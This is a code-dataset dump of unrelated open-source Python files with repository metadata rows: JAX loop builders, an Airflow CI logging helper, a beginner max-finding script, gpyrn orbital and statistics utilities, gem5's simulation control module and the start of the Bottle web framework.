class _BoundedLoopBuilder(_LoopBuilder):
"""Builds a lax operation corresponding to a bounded range iteration."""
def __init__(self, start, stop, step):
self.start = start
self.stop = stop
self.step = step
self._index_var = None # The parameter for the index variable
def can_use_index_var(self):
return True
def build_output_vals(self, scope, carried_state_names, carried_tree,
init_vals, body_closed_jaxpr, body_const_vals):
arange_val = jnp.arange(self.start, stop=self.stop, step=self.step)
return lax_control_flow.scan_p.bind(*body_const_vals, *init_vals, arange_val,
reverse=False, length=arange_val.shape[0],
jaxpr=body_closed_jaxpr,
num_consts=len(body_const_vals),
num_carry=len(init_vals),
linear=(False,) * (len(body_const_vals) +
len(init_vals) + 1),
unroll=1)
class _CondBuilder(_LoopBuilder):
"""Builds a lax.cond operation."""
def __init__(self, pred):
self.index = lax.convert_element_type(pred, np.int32)
def can_use_index_var(self):
return False
def build_output_vals(self, scope, carried_state_names, carried_tree,
init_vals, body_closed_jaxpr, body_const_vals):
# Simulate a pass-through false branch
in_vals, in_tree = tree_util.tree_flatten(
(body_const_vals, tree_util.tree_unflatten(carried_tree, init_vals)))
in_avals = safe_map(_BodyTracer.abstractify, in_vals)
pass_through_closed_jaxpr, pass_through_const_vals, _ = (
lax_control_flow._initial_style_jaxpr(
lambda *args: args[1],
in_tree,
tuple(in_avals)))
assert len(pass_through_const_vals) == 0
args = [*body_const_vals, *init_vals]
return lax_control_flow.cond_p.bind(
self.index, *args,
branches=(pass_through_closed_jaxpr, body_closed_jaxpr),
linear=(False,) * len(args))
class _WhileBuilder(_LoopBuilder):
"""Builds a lax.while operation."""
def __init__(self, cond_func):
self.cond_func = cond_func # Function with 0 arguments (can reference the scope)
def can_use_index_var(self):
return False
def build_output_vals(self, scope, carried_state_names, carried_tree,
init_vals, body_closed_jaxpr, body_const_vals):
# Trace the conditional function. cond_func takes 0 arguments, but
# for lax.while we need a conditional function that takes the
# carried_state_names. _initial_style_jaxpr will start its own trace and
# will create tracers for all the carried state. We must put these values
# in the scope._mutable_state before we trace the conditional
# function.
def cond_func_wrapped(*args):
assert len(args) == len(carried_state_names)
for ms, init_ms in zip(carried_state_names, args):
scope._mutable_state[ms] = init_ms
res = self.cond_func()
# Conditional function is not allowed to modify the scope state
for ms, init_ms in zip(carried_state_names, args):
if not (scope._mutable_state[ms] is init_ms):
raise ValueError(f"Conditional function modifies scope.{ms} field.")
return res
init_avals = safe_map(_BodyTracer.abstractify, init_vals)
cond_jaxpr, cond_consts, cond_tree = (
lax_control_flow._initial_style_jaxpr(cond_func_wrapped,
carried_tree,
tuple(init_avals)))
# TODO: share these checks with lax_control_flow.while
if not tree_util.treedef_is_leaf(cond_tree):
raise TypeError(f"cond_fun must return a boolean scalar, but got pytree {cond_tree}.")
if not safe_map(core.typecompat, cond_jaxpr.out_avals, [core.ShapedArray((), np.bool_)]):
raise TypeError(f"cond_fun must return a boolean scalar, but got output type(s) "
f"{cond_jaxpr.out_avals}.")
return lax_control_flow.while_p.bind(*cond_consts, *body_const_vals, *init_vals,
cond_nconsts=len(cond_consts),
cond_jaxpr=cond_jaxpr,
body_nconsts=len(body_const_vals),
body_jaxpr=body_closed_jaxpr)
| 41.364566
| 106
| 0.687204
|
4a0508334b73c763011960a672e8eeff4c84dc8d
| 1,476
|
py
|
Python
|
dev/breeze/src/airflow_breeze/utils/ci_group.py
|
npodewitz/airflow
|
511ea702d5f732582d018dad79754b54d5e53f9d
|
[
"Apache-2.0"
] | null | null | null |
dev/breeze/src/airflow_breeze/utils/ci_group.py
|
npodewitz/airflow
|
511ea702d5f732582d018dad79754b54d5e53f9d
|
[
"Apache-2.0"
] | null | null | null |
dev/breeze/src/airflow_breeze/utils/ci_group.py
|
npodewitz/airflow
|
511ea702d5f732582d018dad79754b54d5e53f9d
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
from contextlib import contextmanager
@contextmanager
def ci_group(title, enabled: bool = False):
"""
If used in GitHub Action, creates an expandable group in the GitHub Action log.
Otherwise, display simple text groups.
For more information, see:
https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-commands-for-github-actions#grouping-log-lines
"""
if not enabled:
yield
return
if os.environ.get('GITHUB_ACTIONS', 'false') != "true":
print("#" * 20, title, "#" * 20)
yield
return
print(f"::group::{title}")
print()
yield
print("\033[0m")
print("::endgroup::")
| 34.325581
| 125
| 0.70935
|
4a050890aa903cfa9fc5aa904925c2bdd3633ffd
| 540
|
py
|
Python
|
Estrutura de Repetição/7 Qual o maior elemento.py
|
knapoli/programas-python
|
51c3f8f84c3237866a20f37859ef0bcfe9850d15
|
[
"MIT"
] | null | null | null |
Estrutura de Repetição/7 Qual o maior elemento.py
|
knapoli/programas-python
|
51c3f8f84c3237866a20f37859ef0bcfe9850d15
|
[
"MIT"
] | null | null | null |
Estrutura de Repetição/7 Qual o maior elemento.py
|
knapoli/programas-python
|
51c3f8f84c3237866a20f37859ef0bcfe9850d15
|
[
"MIT"
] | null | null | null |
num1 = float(input('Entre com o primeiro numero: '))
num2 = float(input('Entre com o segundo numero: '))
num3 = float(input('Entre com o terceiro numero: '))
num4 = float(input('Entre com o quarto numero: '))
num5 = float(input('Entre com o quinto numero: '))
lista = [num1, num2, num3, num4, num5]
primeiraVez = True
for elemento in lista:
if primeiraVez == True:
maiorElemento = elemento
primeiraVez = False
if elemento > maiorElemento:
maiorElemento = elemento
print('O maior elemento é: ',maiorElemento)
| 36
| 52
| 0.683333
|
4a0508d88289743f4e96fe965e29e4d80a0ebf8d
| 8,075
|
py
|
Python
|
gpyrn/_utils.py
|
j-faria/gpyrn
|
61a3cd0333d8f474521ec7a8298bc97153e5ad34
|
[
"MIT"
] | null | null | null |
gpyrn/_utils.py
|
j-faria/gpyrn
|
61a3cd0333d8f474521ec7a8298bc97153e5ad34
|
[
"MIT"
] | null | null | null |
gpyrn/_utils.py
|
j-faria/gpyrn
|
61a3cd0333d8f474521ec7a8298bc97153e5ad34
|
[
"MIT"
] | 1
|
2021-12-09T13:07:54.000Z
|
2021-12-09T13:07:54.000Z
|
"""
Collection of useful functions
"""
import matplotlib.pyplot as plt
import numpy as np
from scipy.stats import invgamma
from scipy.linalg import cho_solve, cho_factor
from scipy.optimize import minimize
from random import shuffle
##### Semi amplitude calculation ##############################################
def semi_amplitude(period, Mplanet, Mstar, ecc):
"""
Calculates the semi-amplitude (K) caused by a planet with a given
period and mass Mplanet, around a star of mass Mstar, with a
eccentricity ecc.
Parameters
----------
period: float
Period in years
Mplanet: float
Planet's mass in Jupiter masses, tecnically is the M.sin i
Mstar: float
Star mass in Solar masses
ecc: float
Eccentricity between 0 and 1
Returns
-------
float
Semi-amplitude K
"""
per = np.float(np.power(1/period, 1/3))
Pmass = Mplanet / 1
Smass = np.float(np.power(1/Mstar, 2/3))
Ecc = 1 / np.sqrt(1 - ecc**2)
return 28.435 * per * Pmass* Smass * Ecc
##### Keplerian function ######################################################
def keplerian(P=365, K=.1, e=0, w=np.pi, T=0, phi=None, gamma=0, t=None):
"""
keplerian() simulates the radial velocity signal of a planet in a
keplerian orbit around a star.
Parameters
----------
P: float
Period in days
K: float
RV amplitude
e: float
Eccentricity
w: float
Longitude of the periastron
T: float
Zero phase
phi: float
Orbital phase
gamma: float
Constant system RV
t: array
Time of measurements
Returns
-------
t: array
Time of measurements
RV: array
RV signal generated
"""
if t is None:
print()
print('TEMPORAL ERROR, time is nowhere to be found')
print()
#mean anomaly
if phi is None:
mean_anom = [2*np.pi*(x1-T)/P for x1 in t]
else:
T = t[0] - (P*phi)/(2.*np.pi)
mean_anom = [2*np.pi*(x1-T)/P for x1 in t]
#eccentric anomaly -> E0=M + e*sin(M) + 0.5*(e**2)*sin(2*M)
E0 = [x + e*np.sin(x) + 0.5*(e**2)*np.sin(2*x) for x in mean_anom]
#mean anomaly -> M0=E0 - e*sin(E0)
M0 = [x - e*np.sin(x) for x in E0]
i = 0
while i < 1000:
#[x + y for x, y in zip(first, second)]
calc_aux = [x2 - y for x2, y in zip(mean_anom, M0)]
E1 = [x3 + y/(1-e*np.cos(x3)) for x3, y in zip(E0, calc_aux)]
M1 = [x4 - e*np.sin(x4) for x4 in E0]
i += 1
E0 = E1
M0 = M1
nu = [2*np.arctan(np.sqrt((1+e)/(1-e))*np.tan(x5/2)) for x5 in E0]
RV = [gamma + K*(e*np.cos(w)+np.cos(w+x6)) for x6 in nu] #m/s
return t, RV
##### Phase-folding function ##################################################
def phase_folding(t, y, yerr, period):
"""
phase_folding() allows the phase folding (duh...) of a given data
accordingly to a given period
Parameters
----------
t: array
Time
y: array
Measurements
yerr: array
Measurement errors
period: float
Period to fold the data
Returns
-------
phase: array
Phase
folded_y: array
Sorted measurments according to the phase
folded_yerr:array
Sorted errors according to the phase
"""
#divide the time by the period to convert to phase
foldtimes = t / period
#remove the whole number part of the phase
foldtimes = foldtimes % 1
if yerr is None:
yerr = 0 * y
#sort everything
phase, folded_y, folded_yerr = zip(*sorted(zip(foldtimes, y, yerr)))
return phase, folded_y, folded_yerr
##### truncated cauchy distribution ###########################################
def truncCauchy_rvs(loc=0, scale=1, a=-1, b=1, size=None):
"""
Generate random samples from a truncated Cauchy distribution.
Parameters
----------
loc: int
Location parameter of the distribution
scale: int
Scale parameter of the distribution
a, b: int
Interval [a, b] to which the distribution is to be limited
Returns
-------
rvs: float
rvs of the truncated Cauchy
"""
ua = np.arctan((a - loc)/scale)/np.pi + 0.5
ub = np.arctan((b - loc)/scale)/np.pi + 0.5
U = np.random.uniform(ua, ub, size=size)
rvs = loc + scale * np.tan(np.pi*(U - 0.5))
return rvs
##### inverse gamma distribution ###############################################
f = lambda x, lims: \
(np.array([invgamma(a=x[0], scale=x[1]).cdf(lims[0]) - 0.01,
invgamma(a=x[0], scale=x[1]).sf(lims[1]) - 0.01])**2).sum()
def invGamma(lower, upper, x0=[1, 5], showit=False):
"""
Arguments
---------
lower, upper : float
The upper and lower limits between which we want 98% of the probability
x0 : list, length 2
Initial guesses for the parameters of the inverse gamma (a and scale)
showit : bool
Make a plot
"""
limits = [lower, upper]
result = minimize(f, x0=x0, args=limits, method='L-BFGS-B',
bounds=[(0, None), (0, None)], tol=1e-10)
a, b = result.x
if showit:
_, ax = plt.subplots(1, 1, constrained_layout=True)
d = invgamma(a=a, scale=b)
x = np.linspace(0.2*limits[0], 2*limits[1], 1000)
ax.plot(x, d.pdf(x))
ax.vlines(limits, 0, d.pdf(x).max())
plt.show()
return invgamma(a=a, scale=b)
##### log sum ##################################################################
def log_sum(log_summands):
""" log sum operation """
a = np.inf
x = log_summands.copy()
while a == np.inf or a == -np.inf or np.isnan(a):
a = x[0] + np.log(1 + np.sum(np.exp(x[1:] - x[0])))
shuffle(x)
return a
##### multivariate normal ######################################################
def multivariate_normal(r, c, method='cholesky'):
"""
Computes multivariate normal density for "residuals" vector r and
covariance c.
:param array r:
1-D array of k dimensions.
:param array c:
2-D array or matrix of (k x k).
:param string method:
Method used to compute multivariate density.
Possible values are:
* "cholesky": uses the Cholesky decomposition of the covariance c,
implemented in scipy.linalg.cho_factor and scipy.linalg.cho_solve.
* "solve": uses the numpy.linalg functions solve() and slogdet().
:return array: multivariate density at vector position r.
"""
# Compute normalization factor used for all methods.
kk = len(r) * np.log(2*np.pi)
if method == 'cholesky':
# Use Cholesky decomposition of covariance.
cho, lower = cho_factor(c)
alpha = cho_solve((cho, lower), r)
return -0.5 * (kk + np.dot(r, alpha) + 2 * np.sum(np.log(np.diag(cho))))
if method == 'solve':
# Use slogdet and solve
(_, d) = np.linalg.slogdet(c)
alpha = np.linalg.solve(c, r)
return -0.5 * (kk + np.dot(r, alpha) + d)
##### RMS ######################################################################
def rms(array):
""" Root mean square of array
Parameters
----------
array: array
Measurements
Returns
-------
rms: float
Root mean squared error
"""
mu = np.average(array)
rms = np.sqrt(np.sum((array - mu)**2) / array.size)
return rms
def wrms(array, weights):
""" Weighted root mean square of array, given weights
Parameters
----------
array: array
Measurements
weights: array
weights = 1 / errors**2
To add jitter do 1 / (errors*2 + jitter**2)
Returns
-------
rms: float
Weighted root mean squared error
"""
mu = np.average(array, weights=weights)
rms = np.sqrt(np.sum(weights * (array - mu)**2) / np.sum(weights))
return rms
### END
| 28.942652
| 80
| 0.536099
|
4a0509504b111555acb6c2937e83b5382d083703
| 13,421
|
py
|
Python
|
src/python/m5/simulate.py
|
zinob15/gem5
|
fb2946e314ea9e63c7696ee8023150ed13956582
|
[
"BSD-3-Clause"
] | 1
|
2021-10-11T18:06:53.000Z
|
2021-10-11T18:06:53.000Z
|
src/python/m5/simulate.py
|
zinob15/gem5
|
fb2946e314ea9e63c7696ee8023150ed13956582
|
[
"BSD-3-Clause"
] | 1
|
2022-01-31T13:15:08.000Z
|
2022-01-31T13:15:08.000Z
|
src/python/m5/simulate.py
|
zinob15/gem5
|
fb2946e314ea9e63c7696ee8023150ed13956582
|
[
"BSD-3-Clause"
] | 1
|
2021-11-08T18:50:43.000Z
|
2021-11-08T18:50:43.000Z
|
# Copyright (c) 2012,2019 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2005 The Regents of The University of Michigan
# Copyright (c) 2010 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import atexit
import os
import sys
# import the wrapped C++ functions
import _m5.drain
import _m5.core
from _m5.stats import updateEvents as updateStatEvents
from . import stats
from . import SimObject
from . import ticks
from . import objects
from m5.util.dot_writer import do_dot, do_dvfs_dot
from m5.util.dot_writer_ruby import do_ruby_dot
from .util import fatal
from .util import attrdict
# define a MaxTick parameter, unsigned 64 bit
MaxTick = 2**64 - 1
_memory_modes = {
"atomic" : objects.params.atomic,
"timing" : objects.params.timing,
"atomic_noncaching" : objects.params.atomic_noncaching,
}
_drain_manager = _m5.drain.DrainManager.instance()
# The final hook to generate .ini files. Called from the user script
# once the config is built.
def instantiate(ckpt_dir=None):
from m5 import options
root = objects.Root.getInstance()
if not root:
fatal("Need to instantiate Root() before calling instantiate()")
# we need to fix the global frequency
ticks.fixGlobalFrequency()
# Make sure SimObject-valued params are in the configuration
# hierarchy so we catch them with future descendants() walks
for obj in root.descendants(): obj.adoptOrphanParams()
# Unproxy in sorted order for determinism
for obj in root.descendants(): obj.unproxyParams()
if options.dump_config:
ini_file = open(os.path.join(options.outdir, options.dump_config), 'w')
# Print ini sections in sorted order for easier diffing
for obj in sorted(root.descendants(), key=lambda o: o.path()):
obj.print_ini(ini_file)
ini_file.close()
if options.json_config:
try:
import json
json_file = open(
os.path.join(options.outdir, options.json_config), 'w')
d = root.get_config_as_dict()
json.dump(d, json_file, indent=4)
json_file.close()
except ImportError:
pass
if options.dot_config:
do_dot(root, options.outdir, options.dot_config)
do_ruby_dot(root, options.outdir, options.dot_config)
# Initialize the global statistics
stats.initSimStats()
# Create the C++ sim objects and connect ports
for obj in root.descendants(): obj.createCCObject()
for obj in root.descendants(): obj.connectPorts()
# Do a second pass to finish initializing the sim objects
for obj in root.descendants(): obj.init()
# Do a third pass to initialize statistics
stats._bindStatHierarchy(root)
root.regStats()
# Do a fourth pass to initialize probe points
for obj in root.descendants(): obj.regProbePoints()
# Do a fifth pass to connect probe listeners
for obj in root.descendants(): obj.regProbeListeners()
# We want to generate the DVFS diagram for the system. This can only be
# done once all of the CPP objects have been created and initialised so
# that we are able to figure out which object belongs to which domain.
if options.dot_dvfs_config:
do_dvfs_dot(root, options.outdir, options.dot_dvfs_config)
# We're done registering statistics. Enable the stats package now.
stats.enable()
# Restore checkpoint (if any)
if ckpt_dir:
_drain_manager.preCheckpointRestore()
ckpt = _m5.core.getCheckpoint(ckpt_dir)
for obj in root.descendants(): obj.loadState(ckpt)
else:
for obj in root.descendants(): obj.initState()
# Check to see if any of the stat events are in the past after resuming from
# a checkpoint, If so, this call will shift them to be at a valid time.
updateStatEvents()
need_startup = True
def simulate(*args, **kwargs):
global need_startup
if need_startup:
root = objects.Root.getInstance()
for obj in root.descendants(): obj.startup()
need_startup = False
# Python exit handlers happen in reverse order.
# We want to dump stats last.
atexit.register(stats.dump)
# register our C++ exit callback function with Python
atexit.register(_m5.core.doExitCleanup)
# Reset to put the stats in a consistent state.
stats.reset()
if _drain_manager.isDrained():
_drain_manager.resume()
# We flush stdout and stderr before and after the simulation to ensure the
# output arrive in order.
sys.stdout.flush()
sys.stderr.flush()
sim_out = _m5.event.simulate(*args, **kwargs)
sys.stdout.flush()
sys.stderr.flush()
return sim_out
def drain():
"""Drain the simulator in preparation of a checkpoint or memory mode
switch.
This operation is a no-op if the simulator is already in the
Drained state.
"""
# Try to drain all objects. Draining might not be completed unless
# all objects return that they are drained on the first call. This
# is because as objects drain they may cause other objects to no
# longer be drained.
def _drain():
# Try to drain the system. The drain is successful if all
# objects are done without simulation. We need to simulate
# more if not.
if _drain_manager.tryDrain():
return True
# WARNING: if a valid exit event occurs while draining, it
# will not get returned to the user script
exit_event = _m5.event.simulate()
while exit_event.getCause() != 'Finished drain':
exit_event = simulate()
return False
# Don't try to drain a system that is already drained
is_drained = _drain_manager.isDrained()
while not is_drained:
is_drained = _drain()
assert _drain_manager.isDrained(), "Drain state inconsistent"
def memWriteback(root):
for obj in root.descendants():
obj.memWriteback()
def memInvalidate(root):
for obj in root.descendants():
obj.memInvalidate()
def checkpoint(dir):
root = objects.Root.getInstance()
if not isinstance(root, objects.Root):
raise TypeError("Checkpoint must be called on a root object.")
drain()
memWriteback(root)
print("Writing checkpoint")
_m5.core.serializeAll(dir)
def _changeMemoryMode(system, mode):
if not isinstance(system, (objects.Root, objects.System)):
raise TypeError("Parameter of type '%s'. Must be type %s or %s." % \
(type(system), objects.Root, objects.System))
if system.getMemoryMode() != mode:
system.setMemoryMode(mode)
else:
print("System already in target mode. Memory mode unchanged.")
def switchCpus(system, cpuList, verbose=True):
"""Switch CPUs in a system.
Note: This method may switch the memory mode of the system if that
is required by the CPUs. It may also flush all caches in the
system.
Arguments:
system -- Simulated system.
cpuList -- (old_cpu, new_cpu) tuples
"""
if verbose:
print("switching cpus")
if not isinstance(cpuList, list):
raise RuntimeError("Must pass a list to this function")
for item in cpuList:
if not isinstance(item, tuple) or len(item) != 2:
raise RuntimeError("List must have tuples of (oldCPU,newCPU)")
old_cpus = [old_cpu for old_cpu, new_cpu in cpuList]
new_cpus = [new_cpu for old_cpu, new_cpu in cpuList]
old_cpu_set = set(old_cpus)
memory_mode_name = new_cpus[0].memory_mode()
for old_cpu, new_cpu in cpuList:
if not isinstance(old_cpu, objects.BaseCPU):
raise TypeError("%s is not of type BaseCPU" % old_cpu)
if not isinstance(new_cpu, objects.BaseCPU):
raise TypeError("%s is not of type BaseCPU" % new_cpu)
if new_cpu in old_cpu_set:
raise RuntimeError(
"New CPU (%s) is in the list of old CPUs." % (old_cpu,))
if not new_cpu.switchedOut():
raise RuntimeError("New CPU (%s) is already active." % (new_cpu,))
if not new_cpu.support_take_over():
raise RuntimeError(
"New CPU (%s) does not support CPU handover." % (old_cpu,))
if new_cpu.memory_mode() != memory_mode_name:
raise RuntimeError(
"%s and %s require different memory modes." % (new_cpu,
new_cpus[0]))
if old_cpu.switchedOut():
raise RuntimeError("Old CPU (%s) is inactive." % (new_cpu,))
if not old_cpu.support_take_over():
raise RuntimeError(
"Old CPU (%s) does not support CPU handover." % (old_cpu,))
try:
memory_mode = _memory_modes[memory_mode_name]
except KeyError:
raise RuntimeError("Invalid memory mode (%s)" % memory_mode_name)
drain()
# Now all of the CPUs are ready to be switched out
for old_cpu, new_cpu in cpuList:
old_cpu.switchOut()
# Change the memory mode if required. We check if this is needed
# to avoid printing a warning if no switch was performed.
if system.getMemoryMode() != memory_mode:
# Flush the memory system if we are switching to a memory mode
# that disables caches. This typically happens when switching to a
# hardware virtualized CPU.
if memory_mode == objects.params.atomic_noncaching:
memWriteback(system)
memInvalidate(system)
_changeMemoryMode(system, memory_mode)
for old_cpu, new_cpu in cpuList:
new_cpu.takeOverFrom(old_cpu)
def notifyFork(root):
for obj in root.descendants():
obj.notifyFork()
fork_count = 0
def fork(simout="%(parent)s.f%(fork_seq)i"):
"""Fork the simulator.
This function forks the simulator. After forking the simulator,
the child process gets its output files redirected to a new output
directory. The default name of the output directory is the same as
the parent with the suffix ".fN" added where N is the fork
sequence number. The name of the output directory can be
overridden using the simout keyword argument.
Output file formatting dictionary:
parent -- Path to the parent process's output directory.
fork_seq -- Fork sequence number.
pid -- PID of the child process.
Keyword Arguments:
simout -- New simulation output directory.
Return Value:
pid of the child process or 0 if running in the child.
"""
from m5 import options
global fork_count
if not _m5.core.listenersDisabled():
raise RuntimeError("Can not fork a simulator with listeners enabled")
drain()
try:
pid = os.fork()
except OSError as e:
raise e
if pid == 0:
# In child, notify objects of the fork
root = objects.Root.getInstance()
notifyFork(root)
# Setup a new output directory
parent = options.outdir
options.outdir = simout % {
"parent" : parent,
"fork_seq" : fork_count,
"pid" : os.getpid(),
}
_m5.core.setOutputDir(options.outdir)
else:
fork_count += 1
return pid
from _m5.core import disableAllListeners, listenersDisabled
from _m5.core import listenersLoopbackOnly
from _m5.core import curTick
| 35.318421
| 80
| 0.681469
|
4a05097ceefec07a2924d2a19e1da7e6c513f02d
| 142,135
|
py
|
Python
|
traad/bottle.py
|
abingham/traad
|
815020cf0758606fec6bfa7d8ca8e918f377a64d
|
[
"MIT"
] | 74
|
2015-01-10T20:02:41.000Z
|
2021-09-29T15:05:42.000Z
|
traad/bottle.py
|
abingham/traad
|
815020cf0758606fec6bfa7d8ca8e918f377a64d
|
[
"MIT"
] | 37
|
2015-01-06T08:56:43.000Z
|
2022-02-18T06:51:32.000Z
|
traad/bottle.py
|
abingham/traad
|
815020cf0758606fec6bfa7d8ca8e918f377a64d
|
[
"MIT"
] | 16
|
2015-08-02T13:14:58.000Z
|
2022-02-17T00:14:08.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Bottle is a fast and simple micro-framework for small web applications. It
offers request dispatching (Routes) with url parameter support, templates,
a built-in HTTP Server and adapters for many third party WSGI/HTTP-server and
template engines - all in a single file and with no dependencies other than the
Python Standard Library.
Homepage and documentation: http://bottlepy.org/
Copyright (c) 2013, Marcel Hellkamp.
License: MIT (see LICENSE for details)
"""
from __future__ import with_statement
__author__ = 'Marcel Hellkamp'
__version__ = '0.13-dev'
__license__ = 'MIT'
# The gevent server adapter needs to patch some modules before they are imported
# This is why we parse the commandline parameters here but handle them later
if __name__ == '__main__':
from optparse import OptionParser
_cmd_parser = OptionParser(usage="usage: %prog [options] package.module:app")
_opt = _cmd_parser.add_option
_opt("--version", action="store_true", help="show version number.")
_opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.")
_opt("-s", "--server", default='wsgiref', help="use SERVER as backend.")
_opt("-p", "--plugin", action="append", help="install additional plugin/s.")
_opt("--debug", action="store_true", help="start server in debug mode.")
_opt("--reload", action="store_true", help="auto-reload on file changes.")
_cmd_options, _cmd_args = _cmd_parser.parse_args()
if _cmd_options.server and _cmd_options.server.startswith('gevent'):
import gevent.monkey; gevent.monkey.patch_all()
import base64, cgi, email.utils, functools, hmac, imp, itertools, mimetypes,\
os, re, subprocess, sys, tempfile, threading, time, warnings
from datetime import date as datedate, datetime, timedelta
from tempfile import TemporaryFile
from traceback import format_exc, print_exc
from inspect import getargspec
try: from simplejson import dumps as json_dumps, loads as json_lds
except ImportError: # pragma: no cover
try: from json import dumps as json_dumps, loads as json_lds
except ImportError:
try: from django.utils.simplejson import dumps as json_dumps, loads as json_lds
except ImportError:
def json_dumps(data):
raise ImportError("JSON support requires Python 2.6 or simplejson.")
json_lds = json_dumps
# We now try to fix 2.5/2.6/3.1/3.2 incompatibilities.
# It ain't pretty but it works... Sorry for the mess.
py = sys.version_info
py3k = py >= (3, 0, 0)
py25 = py < (2, 6, 0)
py31 = (3, 1, 0) <= py < (3, 2, 0)
# Workaround for the missing "as" keyword in py3k.
def _e(): return sys.exc_info()[1]
# Workaround for the "print is a keyword/function" Python 2/3 dilemma
# and a fallback for mod_wsgi (resticts stdout/err attribute access)
try:
_stdout, _stderr = sys.stdout.write, sys.stderr.write
except IOError:
_stdout = lambda x: sys.stdout.write(x)
_stderr = lambda x: sys.stderr.write(x)
# Lots of stdlib and builtin differences.
if py3k:
import http.client as httplib
import _thread as thread
from urllib.parse import urljoin, SplitResult as UrlSplitResult
from urllib.parse import urlencode, quote as urlquote, unquote as urlunquote
urlunquote = functools.partial(urlunquote, encoding='latin1')
from http.cookies import SimpleCookie
try:
from collections.abc import MutableMapping as DictMixin
except ImportError:
from collections import MutableMapping as DictMixin
import pickle
from io import BytesIO
from configparser import ConfigParser
basestring = str
unicode = str
json_loads = lambda s: json_lds(touni(s))
callable = lambda x: hasattr(x, '__call__')
imap = map
def _raise(*a): raise a[0](a[1]).with_traceback(a[2])
else: # 2.x
import httplib
import thread
from urlparse import urljoin, SplitResult as UrlSplitResult
from urllib import urlencode, quote as urlquote, unquote as urlunquote
from Cookie import SimpleCookie
from itertools import imap
import cPickle as pickle
from StringIO import StringIO as BytesIO
from ConfigParser import SafeConfigParser as ConfigParser
if py25:
msg = "Python 2.5 support may be dropped in future versions of Bottle."
warnings.warn(msg, DeprecationWarning)
from UserDict import DictMixin
def next(it): return it.next()
bytes = str
else: # 2.6, 2.7
from collections import MutableMapping as DictMixin
unicode = unicode
json_loads = json_lds
eval(compile('def _raise(*a): raise a[0], a[1], a[2]', '<py3fix>', 'exec'))
# Some helpers for string/byte handling
def tob(s, enc='utf8'):
return s.encode(enc) if isinstance(s, unicode) else bytes(s)
def touni(s, enc='utf8', err='strict'):
if isinstance(s, bytes):
return s.decode(enc, err)
else:
return unicode(s or ("" if s is None else s))
tonat = touni if py3k else tob
# 3.2 fixes cgi.FieldStorage to accept bytes (which makes a lot of sense).
# 3.1 needs a workaround.
if py31:
from io import TextIOWrapper
class NCTextIOWrapper(TextIOWrapper):
def close(self): pass # Keep wrapped buffer open.
# A bug in functools causes it to break if the wrapper is an instance method
def update_wrapper(wrapper, wrapped, *a, **ka):
try: functools.update_wrapper(wrapper, wrapped, *a, **ka)
except AttributeError: pass
# These helpers are used at module level and need to be defined first.
# And yes, I know PEP-8, but sometimes a lower-case classname makes more sense.
def depr(message, hard=False):
warnings.warn(message, DeprecationWarning, stacklevel=3)
def makelist(data): # This is just to handy
if isinstance(data, (tuple, list, set, dict)): return list(data)
elif data: return [data]
else: return []
class DictProperty(object):
''' Property that maps to a key in a local dict-like attribute. '''
def __init__(self, attr, key=None, read_only=False):
self.attr, self.key, self.read_only = attr, key, read_only
def __call__(self, func):
functools.update_wrapper(self, func, updated=[])
self.getter, self.key = func, self.key or func.__name__
return self
def __get__(self, obj, cls):
if obj is None: return self
key, storage = self.key, getattr(obj, self.attr)
if key not in storage: storage[key] = self.getter(obj)
return storage[key]
def __set__(self, obj, value):
if self.read_only: raise AttributeError("Read-Only property.")
getattr(obj, self.attr)[self.key] = value
def __delete__(self, obj):
if self.read_only: raise AttributeError("Read-Only property.")
del getattr(obj, self.attr)[self.key]
class cached_property(object):
''' A property that is only computed once per instance and then replaces
itself with an ordinary attribute. Deleting the attribute resets the
property. '''
def __init__(self, func):
self.__doc__ = getattr(func, '__doc__')
self.func = func
def __get__(self, obj, cls):
if obj is None: return self
value = obj.__dict__[self.func.__name__] = self.func(obj)
return value
class lazy_attribute(object):
''' A property that caches itself to the class object. '''
def __init__(self, func):
functools.update_wrapper(self, func, updated=[])
self.getter = func
def __get__(self, obj, cls):
value = self.getter(cls)
setattr(cls, self.__name__, value)
return value
###############################################################################
